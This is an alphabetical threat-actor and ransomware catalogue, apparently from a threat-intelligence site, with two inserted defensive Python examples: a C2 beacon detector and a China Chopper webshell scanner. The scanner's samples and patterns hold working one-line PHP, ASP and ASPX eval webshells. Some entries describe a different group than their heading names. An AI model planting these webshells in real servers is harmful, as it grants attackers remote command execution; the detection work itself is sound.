Being one of the most active malware distributors, Hive0137 demonstrates a willingness to explore new payloads and technologies such as GenAI. They have quickly moved onto the same level as other high-profile distributors such as TA577, and will likely be responsible for future phishing campaigns, facilitating initial access for ransomware affiliates. Hive0137’s combination of intent, capabilities and relationships with other groups presents a direct threat to organizations all over the world. As threat actors pick up the pace and increasingly adopt AI technologies for malicious purposes, it is important that organizations are aware of the most recent threats and their capabilities to maintain a strong security posture.

Hive0163

Hive0163 is a financially motivated ransomware group responsible for deploying Interlock ransomware, utilizing ClickFix social engineering for initial access. They employ the AI-generated PowerShell backdoor Slopoly for persistent command-and-control access, which checks in with attacker infrastructure every 50 seconds and transmits telemetry every 30 seconds. The group leverages AzCopy for bulk data exfiltration to Azure blob storage before executing ransomware, employing a five-stage attack chain. Their operations are characterized by the use of initial access brokers and a variety of custom backdoors for long-term access and data exfiltration.
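The fixed 50-second check-in described above is the kind of signal a periodic-beacon detector picks up from proxy or firewall logs. The following is an added example, not IBM X-Force's or the page's code, and it makes no claim about Slopoly's real traffic beyond the interval stated: it groups requests by (source, destination host), computes inter-arrival times and flags pairs whose intervals cluster tightly around a median. The log format, every address, host name and timestamp are constructed for the example, and the toy assumes one stream per host (a real implementation would also have to separate interleaved streams to the same destination).

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Added example: periodic-beacon detection over simple proxy-style log lines.
# Format (constructed for this example): "<ISO8601 UTC> <src_ip> <method> <url> <status>"
LOG_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def parse_line(line):
    """Parse one log line into (timestamp, src_ip, destination host)."""
    ts, src, _method, url, _status = line.split()
    host = url.split("//", 1)[1].split("/", 1)[0]
    return datetime.strptime(ts, LOG_FORMAT).replace(tzinfo=timezone.utc), src, host


def find_beacons(lines, min_events=6, max_jitter_ratio=0.1):
    """Return {(src, host): (median_interval_s, jitter_s)} for periodic pairs.

    A pair is flagged when it has at least min_events requests and the
    inter-arrival times are tightly clustered around their median (population
    standard deviation no more than max_jitter_ratio of the median). Human
    browsing produces bursty, irregular gaps and falls outside this band.
    """
    by_pair = defaultdict(list)
    for line in lines:
        ts, src, host = parse_line(line)
        by_pair[(src, host)].append(ts)

    beacons = {}
    for pair, times in by_pair.items():
        if len(times) < min_events:
            continue
        times.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median = statistics.median(deltas)
        if median <= 0:
            continue  # duplicate timestamps; nothing periodic to measure
        jitter = statistics.pstdev(deltas)
        if jitter / median <= max_jitter_ratio:
            beacons[pair] = (median, jitter)
    return beacons


def build_sample_log():
    """Constructed sample: a 50 s check-in to a C2 host plus irregular browsing."""
    base = datetime(2025, 1, 1, 10, 0, 0)
    lines = []
    # Check-in roughly every 50 s with +/-1 s of jitter (offsets are constructed).
    for off in (0, 50, 101, 149, 200, 251, 299, 350, 400, 451):
        ts = (base + timedelta(seconds=off)).strftime(LOG_FORMAT)
        lines.append(f"{ts} 10.0.0.5 POST https://203.0.113.10/api/checkin 200")
    # Ordinary browsing from the same host: bursty, no stable period.
    for off in (0, 3, 43, 45, 165, 172, 187, 400):
        ts = (base + timedelta(seconds=off)).strftime(LOG_FORMAT)
        lines.append(f"{ts} 10.0.0.5 GET https://www.example.com/news 200")
    return lines


if __name__ == "__main__":
    for (src, host), (median, jitter) in find_beacons(build_sample_log()).items():
        print(f"beacon candidate {src} -> {host}: ~{median:.0f}s interval, jitter {jitter:.1f}s")
```

Tune `min_events` and `max_jitter_ratio` to the log volume at hand; a backdoor that randomizes its sleep would need a wider jitter band, at the cost of more false positives from polling applications such as mail clients.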

Hog

ransomware

HolidayCheer

ransomware

HollowQuill

SEQRITE Labs APT-Team has been tracking and has uncovered a campaign targeting the Baltic State Technical University, a well-known institution for defense, aerospace and advanced engineering programs that contribute to Russia's military-industrial complex. Tracked as Operation HollowQuill, the campaign leverages weaponized decoy documents masquerading as official research invitations to infiltrate academic, governmental and defense-related networks. The threat entity delivers a malicious RAR file containing a .NET malware dropper, which in turn drops a Go-based shellcode loader, a legitimate OneDrive application and a decoy PDF, with Cobalt Strike as the final payload.

Hollycrypt Ransomware

The ransom note is written in English, so it is most likely aimed at English-speaking users, though anyone can be affected. It is spread via email spam, fake updates and malicious attachments, and encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

HolyCrypt

Ransomware

holyghost

HolyGhost is a ransomware group first publicly reported in July 2022, believed to be operated by a North Korean state-sponsored threat actor tracked as APT43 or Andariel, a subgroup of the Lazarus Group. The group has been active since at least June 2021, using a double-extortion model that combines encryption of victim files with threats to leak stolen data via a Tor site. Early HolyGhost variants (BTLC_C.exe) used a custom file extension .h0lyenc, while later builds added more robust encryption, obfuscation, and evasion capabilities. Targeted victims include small and medium-sized businesses in manufacturing, finance, education, and event planning, primarily in the United States, South Korea, Brazil, and India. Intrusion methods include exploitation of vulnerable public-facing applications, credential theft, and possibly the use of purchased access from other threat actors. Unlike purely criminal groups, HolyGhost is suspected of being leveraged for both revenue generation and strategic cyber operations in support of DPRK objectives.

HomeLand Justice

HomeLand Justice is an Iranian state-sponsored cyber threat group that has been active since at least May 2021. They have targeted various organizations, including a well-known telecommunication company and the Albanian Parliament. The group engaged in information operations and messaging campaigns to amplify the impact of their attacks.

Homeland

Homeland is an active extortion or ransomware group tracked by RansomLook.

Honeybee

McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks. Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them. The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.

Honor

ransomware

HookAds

HookAds is a malvertising campaign that purchases cheap ad space on low-quality ad networks commonly used by adult web sites, online games, or blackhat SEO sites. These ads include JavaScript that redirects a visitor through a series of decoy sites that look like pages filled with native advertisements, online games, or other low-quality content. Under the right circumstances, the visitor silently loads the Fallout exploit kit, which tries to install its malware payload.

Horros

ransomware

Hotarus

Hotarus is a ransomware and data extortion group first observed in March 2021, believed to be linked to threat actors of Latin American origin. The group has targeted entities in South America and the United States, including financial institutions, government agencies, and private companies. Hotarus is known for deploying both custom ransomware and publicly available tools, alongside stealing sensitive information for double-extortion purposes. The group has been observed exploiting vulnerable web services, using stolen credentials, and leveraging publicly available post-exploitation frameworks to gain persistence in victim networks. Encrypted files are typically appended with extensions such as .hotarus or campaign-specific identifiers, and ransom notes direct victims to communicate via encrypted email services. Notably, in some campaigns, Hotarus deployed data leak threats without encrypting files, focusing solely on exposure as a pressure tactic.

Houken

Houken is a Chinese state-sponsored threat actor that exploits zero-day vulnerabilities in Ivanti Cloud Services Appliance devices to gain initial access to critical infrastructure networks, particularly in France. The group employs a sophisticated rootkit alongside open-source tools, primarily developed by Chinese-speaking authors, to maintain persistence and control over compromised systems. Houken is suspected to operate as an initial access broker, selling footholds in targeted networks to other threat actors for further exploitation.

HOUND SPIDER

According to CrowdStrike, HOUND SPIDER affiliates were arrested in Romania in December 2017.

Houndstooth Typhoon

Microsoft threat actor profile. Origin/Threat: China.

HowAreYou

ransomware

HPE iLO 4 Ransomware

Attackers are targeting Internet-accessible HPE iLO 4 remote management interfaces, supposedly encrypting the hard drives, and then demanding bitcoins to restore access to the data. According to the victim, the attackers are demanding 2 bitcoins to regain access to the drives. The attackers also provide a bitcoin address to the victim for payment; these addresses appear to be unique per victim, as this victim's differed from other reported ones. An interesting part of the ransom note is that the attackers state that the ransom price is not negotiable unless the victims are from Russia. This is common for Russian-based attackers, who in many cases try to avoid infecting Russian victims. Finally, could this be a decoy or wiper rather than a true ransomware attack? Ransomware attacks typically provide a unique ID to the victim in order to distinguish one victim from another, which prevents a victim from "stealing" another victim's payment and using it to unlock their own computer. In a situation like this, where no unique ID is given to identify the encrypted computer and the contact email is publicly known, the main goal may be to wipe a server or to act as a decoy for another attack.

HSHARADA

The ransomware was identified in early April 2023 and is said to target English-speaking users, potentially among others. The extension added to encrypted files is ".m9SRob" (possibly random per victim). The ransom note is named "m9SRob-README.txt". There are no further details about the group or the targeted file types, but it does assign an ID to each victim.

HTCryptor

Ransomware. Includes a feature to disable the victim's Windows firewall. Modified in-development HiddenTear build.

Hucky Ransomware

The ransom note is written in English, so it is most likely aimed at English-speaking users, though anyone can be affected. It is spread via email spam, fake updates and malicious attachments, and encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. Based on Locky.

HugeMe Ransomware

It targets English-speaking users and is therefore able to infect victims worldwide. It spreads via email spam, fake updates, malicious attachments and similar vectors, and encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

HummingBad

This group created malware that takes over Android devices and generates $300,000 per month in fraudulent ad revenue. The group effectively controls an arsenal of over 85 million mobile devices around the world, with the potential to sell access to these devices to the highest bidder.

Hunt

Hunt ransomware is a variant of the Dharma/CrySIS ransomware family. This variant creates a unique ID for each victim, appends the extension '.hunt' to encrypted files, and leaves a ransom note known as info-hunt.txt. The Dharma/CrySIS ransomware family emerged around mid-2016 as a Ransomware-as-a-Service (RaaS) program, utilizing various initial intrusion methods such as phishing, disguising as legitimate software, and exploiting open RDP connections. This variant uses AES-256 encryption (CBC mode) or DES+RSA and demands payment to recover files. Upon execution, the ransomware generates a 256-bit AES decryption key, which is then encrypted along with random bytes using the RSA-1024 algorithm and stored at the end of the encrypted file. The ransomware is written in C/C++ and compiled using MS Visual Studio. Regarding geographic attribution, it has been identified in use by threat actors from Russia, Ukraine, India, and other countries.

Hunt3r Kill3rs

Hunt3r Kill3rs is a newly emerged threat group claiming expertise in cyber operations, including ICS breaches and web application vulnerabilities exploitation. They have discussed using Java fuzzing in their exploits and have made unverified claims of joint attacks with other threat actors.

Hunters

Hunters International is a ransomware group first identified in October 2023, believed to have taken over or rebranded from the now-defunct Hive ransomware operation. Shortly after its emergence, security researchers found significant code overlaps with Hive, suggesting that Hunters International either acquired Hive’s source code or involved former Hive developers. The group operates a double-extortion model—encrypting victim data and threatening to leak it on a Tor-based site. It has targeted organizations worldwide across healthcare, manufacturing, education, and government sectors. The ransomware is written in Rust, supports both Windows and Linux/ESXi environments, and appends extensions such as .locked to encrypted files. Initial access is typically obtained via compromised RDP credentials, phishing campaigns, or vulnerabilities in exposed systems.

HURRICANE PANDA

We have investigated their intrusions since 2013 and have been battling them nonstop over the last year at several large telecommunications and technology companies. The determination of this China-based adversary is truly impressive: they are like a dog with a bone. HURRICANE PANDA's preferred initial vector of compromise and persistence is a China Chopper webshell – a tiny and easily obfuscated 70 byte text file that consists of an ‘eval()’ command, which is then used to provide full command execution and file upload/download capabilities to the attackers. This script is typically uploaded to a web server via a SQL injection or WebDAV vulnerability, which is often trivial to uncover in a company with a large external web presence. Once inside, the adversary immediately moves on to execution of a credential theft tool such as Mimikatz (repacked to avoid AV detection). If they are lucky to have caught an administrator who might be logged into that web server at the time, they will have gained domain administrator credentials and can now roam your network at will via ‘net use’ and ‘wmic’ commands executed through the webshell terminal.
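The China Chopper shell described above is worth hunting for precisely because it is so small: a single `eval()` fed straight from a request parameter. The following is an added example, not CrowdStrike's or the page's code, of a minimal scanner for that pattern in PHP, classic ASP and ASPX files. The regular expressions are my own approximation of the publicly known one-liners, the `TINY_SHELL_MAX_BYTES` threshold is a chosen heuristic, and the sample files are constructed for the example; obfuscated variants can evade these patterns, so a miss is inconclusive.

```python
import re
from pathlib import Path

# Added example: signatures for China Chopper style one-line webshells. Each
# pattern (an assumption, not an official signature) looks for eval() whose
# argument comes directly from a request parameter.
CHOPPER_PATTERNS = {
    # <?php @eval($_POST['password']);?>  (also catches eval(base64_decode($_POST[..])))
    "php": re.compile(r"@?\beval\s*\(.{0,80}?\$_(?:POST|GET|REQUEST)\s*\[", re.I | re.S),
    # <%eval request("password")%>
    "asp": re.compile(r"\beval\s*\(?\s*request\s*\(", re.I),
    # <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>
    "aspx": re.compile(r"\beval\s*\(\s*Request\.Item\s*\[", re.I),
}

# Heuristic (chosen for this example): the real shell is a few dozen bytes, so a
# match inside a tiny file is a much stronger signal than one inside a large app.
TINY_SHELL_MAX_BYTES = 512


def scan_content(data: bytes) -> list[str]:
    """Return the names of the CHOPPER_PATTERNS that match a file's content."""
    text = data.decode("utf-8", errors="replace")
    return [name for name, pat in CHOPPER_PATTERNS.items() if pat.search(text)]


def scan_files(files: dict[str, bytes]) -> dict[str, dict]:
    """Scan an in-memory {path: content} map and return findings per matching file."""
    findings = {}
    for path, data in files.items():
        hits = scan_content(data)
        if hits:
            findings[path] = {
                "patterns": hits,
                "size": len(data),
                "tiny": len(data) <= TINY_SHELL_MAX_BYTES,
            }
    return findings


def scan_webroot(root: str, suffixes=(".php", ".asp", ".aspx", ".ashx", ".asmx")) -> dict[str, dict]:
    """Walk a real web root and apply the same checks to server-side script files."""
    files = {
        str(p): p.read_bytes()
        for p in Path(root).rglob("*")
        if p.is_file() and p.suffix.lower() in suffixes
    }
    return scan_files(files)


# Constructed samples (not taken from any incident) so the script runs offline.
SAMPLES = {
    "a.php": b"<?php @eval($_POST['password']);?>",
    "b.asp": b'<%eval request("pass")%>',
    "c.aspx": b'<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "d.php": b"<?php @eval(base64_decode($_POST['x'])); ?>",
    "index.php": b"<?php echo 'hello'; ?>",
}

if __name__ == "__main__":
    for path, f in scan_files(SAMPLES).items():
        print(f"{path}: {f['patterns']} size={f['size']} tiny={f['tiny']}")
```

Run `scan_webroot("/var/www")` (or the IIS `inetpub` directory) on a suspected host; pair the content match with file timestamps and web-server access logs for POST requests to the flagged path, since the shell only does something when the attacker posts code to it.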

Hydra

ransomware

HydraCrypt

Ransomware. CrypBoss family.

Hyflock

Hyflock is an active extortion or ransomware group tracked by RansomLook.

Icarus

Icarus is an active extortion or ransomware group tracked by RansomLook.

Icefire

Icefire is an active extortion or ransomware group tracked by RansomLook.

Icelandic Crisis Response Unit

Icelandic Defense Agency's Analysis Unit – Greiningardeild Varnarmálastofnunar Íslands (GVMSÍ) (Defunct)

Icelandic Police

The National Police Commissioner's Analysis Unit – Greiningardeild Ríkislögreglustjóra (GRLS)

IcePeony

IcePeony is a China-nexus APT group that has been active since at least 2023, targeting government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam. They primarily employ SQL injection techniques to exploit vulnerabilities in publicly accessible web servers, subsequently installing web shells or executing malware like IceCache to facilitate credential theft. IcePeony operates under harsh work conditions, potentially adhering to the 996 working hour system, and shows a particular interest in the governments of Indian Ocean countries. Their activities suggest alignment with China's national interests, possibly related to maritime strategy.

Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia

Indonesian National Police Intelligence and Security Agency - Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia

IFN643 Ransomware

The ransom note is written in English, so it is most likely aimed at English-speaking users, though anyone can be affected. It is spread via email spam, fake updates and malicious attachments, and encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

IGotYou

ransomware

iGZa4C

ransomware

ILElection2020

ransomware

iLock

Ransomware

iLockLight

Ransomware

Immuni

ransomware

Imn Crew

Imn Crew is an active extortion or ransomware group tracked by RansomLook.

IMPERSONATING PANDA

IMPERSONATING PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Ims00ry

ransomware

ImSorry

ransomware

Incanto

ransomware

Inception Framework

This threat actor uses spear-phishing techniques to target private-sector energy, defense, aerospace, research, and media organizations and embassies in Africa, Europe, and the Middle East, for the purpose of espionage.

Indian Army

Directorate of Military Intelligence

INDOHAXSEC TEAM

INDOHAXSEC TEAM is an Indonesian group that claims to have developed a web-based version of WannaCry, asserting the ability to encrypt websites and demand Bitcoin as ransom. However, their technical capabilities remain uncertain, as creating ransomware of this scale requires significant expertise. The group's claims may be exaggerated for attention, and verified evidence is needed to assess their true capabilities.

Indonesian Army Intelligence Centre

Indonesian Army Intelligence Centre (PUSINTELAD) – Pusat Intelijen Tentara Nasional Indonesia Angkatan Darat

Indonesian Financial Transaction Reports and Analysis Center

Indonesian Financial Transaction Reports and Analysis Center (PPATK) – Pusat Pelaporan dan Analisis Transaksi Keuangan

Indonesian Strategic Intelligence Agency

Indonesian Strategic Intelligence Agency (BAIS) – Badan Intelijen Strategis Tentara Nasional Indonesia

Indrik

ransomware

InducVirus

ransomware

InfinityLock

ransomware

InfoDot

ransomware

Információs Hivatal

Információs Hivatal (IH) (Information Office)

Information and Security Service of the Republic of Moldova

Information and Security Service (SIS)

Infrastructure Destruction Squad

Dark Engine has emerged as a significant threat actor targeting industrial control systems and SCADA systems in sectors such as metallurgy and food processing. The group has conducted multiple ICS-targeted incidents, with a pronounced operational surge in June 2025. Additionally, Dark Engine is involved in a campaign that embeds fraudulent CAPTCHA prompts into legitimate WordPress sites, utilizing SEO poisoning to harvest login credentials. Reports also indicate a data leak from Dark Engine that exposed sensitive phone data in the U.S.

Infy

Infy is a group of suspected Iranian origin. Since early 2013, we have observed activity from a unique threat actor group, which we began to investigate based on increased activities against human right activists in the beginning of 2015. In line with other research on the campaign, released prior to publication of this document, we have adopted the name “Infy”, which is based on labels used in the infrastructure and its two families of malware agents. Thanks to information we have been able to collect during the course of our research, such as characteristics of the group’s malware and development cycle, our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state. Amongst a backdrop of other incidents, Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014, growing in use up to the February 2016 parliamentary election in Iran. After the conclusion of the parliamentary election, the rate of attempted intrusions and new compromises through the Infy agent slowed, but did not end. The trends witnessed in reports from recipients are reinforced through telemetry provided by design failures in more recent versions of the Infy malware.

INJ3CTOR3

INJ3CTOR3 is a threat actor first identified in 2020, known for targeting vulnerabilities in VoIP systems, specifically CVE-2019-19006 and CVE-2021-45461. Their operations involve exploiting FreePBX vulnerabilities to deploy PHP web shells for data exfiltration and persistence. The group utilizes tools for SIP server exploitation, including brute-force scripts and authentication bypass techniques. Observations indicate a resurgence of their attack patterns, reflecting historical behaviors while adapting to current vulnerabilities.

INPIVX

ransomware

insane ransomware

Insane is a relatively obscure ransomware family first reported in late 2021, with few confirmed incidents in public threat intelligence. It encrypts victim files using symmetric encryption (AES) combined with RSA for key protection and appends the .insane extension to affected files. The ransom note, typically named INSANE_README.txt, directs victims to contact the operators via email for decryption instructions. Based on limited reporting, Insane does not appear to operate as a Ransomware-as-a-Service (RaaS) platform; instead, it seems to be deployed by the core operators in targeted attacks. Initial access methods are not well-documented, but suspected vectors include phishing attachments and exploitation of exposed RDP services. The group’s small footprint in open-source intelligence suggests limited distribution or use in highly selective campaigns.

InsaneCrypt

ransomware

Insomnia

Insomnia is an active extortion or ransomware group tracked by RansomLook.

InstallPay

ransomware

Institutional Security Bureau

Gabinete de Segurança Institucional (Institutional Security Bureau, GSI). Responds directly to the president's office and the armed forces and coordinates some intelligence operations.

IntelBroker

IntelBroker is a threat actor known for orchestrating high-profile data breaches targeting companies like Apple, Zscaler, and Facebook Marketplace. They have a reputation for selling access to compromised systems and data on underground forums like BreachForums. IntelBroker has claimed responsibility for breaches involving government agencies such as Europol, the U.S. Department of Transportation, and the Pentagon, leaking sensitive information and classified documents. The actor has been linked to breaches at companies like Acuity, General Electric, and Home Depot, showcasing a pattern of targeting critical infrastructure and major corporations.

Inteligencia de la Gendarmería Nacional Argentina

Argentine National Gendarmerie Intelligence (SIGN) – Inteligencia de la Gendarmería Nacional Argentina

Inteligencia de la Policía Bonaerense

Buenos Aires Police Intelligence (SIPBA) – Inteligencia de la Policía Bonaerense

Inteligencia de la Policía de Seguridad Aeroportuaria

Airport Security Police Intelligence – Inteligencia de la Policía de Seguridad Aeroportuaria

Inteligencia de la Policía Federal Argentina

Argentine Federal Police Intelligence – Inteligencia de la Policía Federal Argentina

Inteligencia de la Prefectura Naval Argentina

Argentine Naval Prefecture Intelligence (SIPN) – Inteligencia de la Prefectura Naval Argentina

Inteligencia del Servicio Penitenciario Federal

Federal Penitentiary Service Intelligence – Inteligencia del Servicio Penitenciario Federal

Intelligence Agency of North Macedonia

Intelligence Agency (Agencija za Razuznavanje) (Civilian Agency) IA

Intelligence and Counter-Terrorism Directorate - Ministry of Interior

Intelligence and Counter-Terrorism Directorate - Ministry of Interior

Intelligence and Security Service of Slovenian Ministry of Defence - Obveščevalno Varnostna Služba (OVS)[26]

Intelligence and Security Service of Slovenian Ministry of Defence - Obveščevalno Varnostna Služba (OVS)[26]

Intelligence Branch

Intelligence Branch

Intelligence Bureau (IB)

Intelligence Bureau (IB)

Intelligence Bureau (India)

Intelligence Bureau (IB)

Intelligence Bureau (Pakistan)

Intelligence Bureau (IB)

Intelligence Directorate

Dirección General de Inteligencia (DGI)

Intelligence Division (Finland)

Defense Command Intelligence Division – Pääesikunnan tiedusteluosasto (PE TIEDOS) / Huvudstabens underrättelseavdelning

Intelligence org of FARAJA

Intelligence org of FARAJA

Intelligence org of the Islamic Republic of Iran[12]

Intelligence org of the Islamic Republic of Iran[12]

Intelligence Organization of Army of the Guardians of the Islamic Revolution

Intelligence Organization of IRGC

Intelligence Protection Organization of Army of the Guardians of the Islamic Revolution

Intelligence Protection Organization of IRGC (SAHEFASA)

Intelligence Protection Organization of Islamic Republic of Iran Army

Intelligence Protection Organization of Iranian Army (SAHEFAJA)

Intelligence-Security Agency of Bosnia and Herzegovina

Intelligence-Security Agency of Bosnia and Herzegovina (OSA)

Inter-Services Intelligence

Inter-Services Intelligence (ISI)

Interlock

Interlock is an active extortion or ransomware group tracked by RansomLook.

Internal Security Affairs Bureau (ISAB)

Internal Security Affairs Bureau (ISAB)

Internal Security Department (Brunei)

Internal Security Department (Brunei)[4] (internal)

Internal Security Department (Singapore)

Internal Security Department (ISD)

Internal Security Operations Command

Internal Security Operations Command (ISOC)

Internal Security Service

Internal Security Service [Internal Security]

International Liaison Department of the Chinese Communist Party

International Department (ID)

International Police Association

Ransomware CryptoTorLocker2015 variant

Invaderx

Invaderx is an active extortion or ransomware group tracked by RansomLook.

InvisiMole

Adversary group targeting diplomatic missions, governmental and military organisations, mainly in Ukraine.

IPA

ransomware

iRansom

Ransomware

Iraqi National Intelligence Service

Iraqi National Intelligence Service (INIS) – foreign intelligence and special operations

IRIDIUM

Resecurity’s research indicates that the attack on Parliament is a part of a multi-year cyberespionage campaign orchestrated by a nation-state actor whom we are calling IRIDIUM. This actor targets sensitive government, diplomatic, and military resources in the countries comprising the Five Eyes intelligence alliance (which includes Australia, Canada, New Zealand, the United Kingdom and the United States).

IRLeaks

IRLeaks is a threat actor known for significant cyberattacks targeting Iranian organizations, including a major breach of SnappFood, where they exfiltrated 3TB of sensitive data from 20 million user profiles. They have also compromised data from 23 leading Iranian insurance companies, offering over 160 million records for sale. Their operations involve extortion tactics, as seen in the ransom negotiations with Tosan, and they utilize malware such as StealC for data extraction. IRLeaks communicates primarily in Persian and has been active in selling stolen data on cybercriminal marketplaces.

Iron Group

Iron Group has developed multiple types of malware (backdoors, crypto-miners, and ransomware) for Windows, Linux and Android platforms. They have used their malware to successfully infect at least a few thousand victims.

Iron

It is currently unknown if Iron is indeed a new variant by the same creators of Maktub, or if it was simply inspired by the latter, by copying the design for the payment portal for example. We know the Iron ransomware has mimicked at least three ransomware families: Maktub (payment portal design); DMA Locker (Iron Unlocker decryption tool); Satan (exclusion list).

Ironcat

ransomware

Ironchain

Ironchain is an active extortion or ransomware group tracked by RansomLook.

IronErn440

IronErn440 is a threat actor tracked by Oligo Security for orchestrating the ShadowRay 2.0 campaign, an evolution of attacks since September 2023 exploiting CVE-2023-48022, a missing authentication flaw in the Ray AI framework's Job Submission API. The actor submits malicious jobs to exposed Ray clusters (port 8265), deploying multi-stage Bash/Python payloads via GitHub/GitLab repositories like "ironern440-group" and "thisisforwork440-ops" to propagate worm-like, hijack NVIDIA GPUs for XMRig cryptomining, pivot laterally, create reverse shells, kill competing miners, limit CPU to 60%, and persist via cron jobs pulling updates every 15 minutes. Additional capabilities include DDoS via sockstress on port 3333 (targeting mining pools), region-specific malware (e.g., China checks), LLM-generated payloads, and use of tools like interact.sh for scanning over 230,500 public Ray servers; mitigations involve firewalling, authorization, and Anyscale's port checker.

IronHusky

IronHusky is a China-based threat actor first attributed in July 2017, targeting Russian and Mongolian governments, as well as aviation companies and research institutes. Since their initial attacks ceased in 2018, they have been working on a new remote access trojan dubbed MysterySnail.

Ishtar Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

IT.Books

ransomware

ItaDuke

ItaDuke is an actor known since 2013. It used PDF exploits for dropping malware and Twitter accounts to store C2 server URLs. In 2018, Kaspersky attributed an actor named DarkUniverse, which was active between 2009 and 2017, to ItaDuke.

Izis

Izis is an active extortion or ransomware group tracked by RansomLook.

J Group

J Group is an active extortion or ransomware group tracked by RansomLook.

J-

ransomware

JabaCrypter

ransomware

Jabaroot

JabaRoot is an Algerian hacker group that has targeted Moroccan government systems, successfully exfiltrating sensitive data from the Ministry of Economic Inclusion and the National Social Security Fund (CNSS). The group has claimed responsibility for the breach, which has raised concerns among cybersecurity experts regarding its scale and impact on citizens' privacy. The motives behind the attack remain unclear, but it has been noted as one of Morocco's most significant cyber-attacks affecting multiple victims. Resecurity has identified the group's activities as part of a broader trend of APT activity targeting government entities in the region.

JackPot Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

Jaff

We recently observed several large scale email campaigns that were attempting to distribute a new variant of ransomware that has been dubbed "Jaff". Interestingly we identified several characteristics that we have previously observed being used during Dridex and Locky campaigns. In a short period of time, we observed multiple campaigns featuring high volumes of malicious spam emails being distributed, each using a PDF attachment with an embedded Microsoft Word document functioning as the initial downloader for the Jaff ransomware.

Jaffe

ransomware

JagerDecryptor

Ransomware. Prepends filenames.

James

ransomware

JapanLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc. Uses Base64 encoding, ROT13, and top-bottom swapping.

Jasper Sleet

Microsoft threat actor profile. Origin/Threat: North Korea.

Java NotDharma

ransomware

JavaGhost

JavaGhost is a threat actor group that has targeted cloud environments, particularly AWS, for phishing campaigns without engaging in data theft for extortion. They exploit overly permissive IAM permissions and utilize long-term access keys to gain initial access, employing the GetFederationToken API to acquire temporary credentials for console access. JavaGhost has demonstrated advanced evasion techniques, avoiding common detection methods by not using the GetCallerIdentity API call. Their activities generate detectable logging footprints in CloudTrail, allowing organizations to identify and respond to their tactics.

jCandy

ransomware

JCrypt

Ransomware written in C#. Fortunately, all current versions of the MafiaWare666 ransomware are decryptable. The Threat Lab from Avast has developed a free decryption tool for this malware.

JeepersCrypt

ransomware

Jeff the Ransomware

Looks to be in-development as it does not encrypt.

Jeiphoos

Ransomware for Windows and Linux. Campaign stopped. The actor claimed to have deleted the master key.

Jemd

ransomware

JesusCrypt

ransomware

Jhon Woddy

Ransomware. Same codebase as DNRansomware. Lock screen password is M3VZ>5BwGGVH.

Jigsaw

Ransomware. Has a GUI.

JINX-0126

Wiz Threat Research identified a new variant of an ongoing malicious campaign targeting misconfigured and publicly exposed PostgreSQL servers. In the observed attack, the threat actor (tracked by Wiz as JINX-0126) abuses exposed PostgreSQL instances, configured with weak and guessable login credentials, to gain access and to deploy XMRig-C3 cryptominers. This campaign was first documented by Aqua Security, but the threat actor has since evolved, implementing defense evasion techniques such as deploying binaries with a unique hash per target and executing the miner payload filelessly—likely to evade detection by CWPP solutions that rely solely on file hash reputation.

JNEC.a

ransomware

Jo Of Satan

Jo Of Satan is an active extortion or ransomware group tracked by RansomLook.

Job Crypter

Ransomware. Based on HiddenTear but uses TripleDES; the decrypter is a proof of concept.

JoeGo

ransomware

JohnBorn

ransomware

JohnyCryptor

Ransomware

Joint Cipher Bureau

Joint Cipher Bureau

Joint Cyberspace Command

Joint Cyberspace Command (MCCE)

Joint Intelligence Organisation (United Kingdom)

Joint Intelligence Organisation (JIO)[32] – Joint intelligence analysis.

Joint Sigint Cyber Unit

Joint Sigint Cyber Unit (JSCU)

Joint Staff Department of the Central Military Commission Intelligence Bureau

Intelligence Bureau of the General Staff aka 2nd Bureau

Joint Task Force X

Joint Task Force X

JoJoCrypter

ransomware

Joker Korean

ransomware

Jokeroo

A new Ransomware-as-a-Service called Jokeroo is being promoted on underground hacking sites and via Twitter that allows affiliates to allegedly gain access to a fully functional ransomware and payment server. According to a malware researcher named Damian, the Jokeroo RaaS first started promoting itself as a GandCrab Ransomware RaaS on the underground hacking forum Exploit.in.

Jolly Roger

ransomware

JosepCrypt

ransomware

jsworm

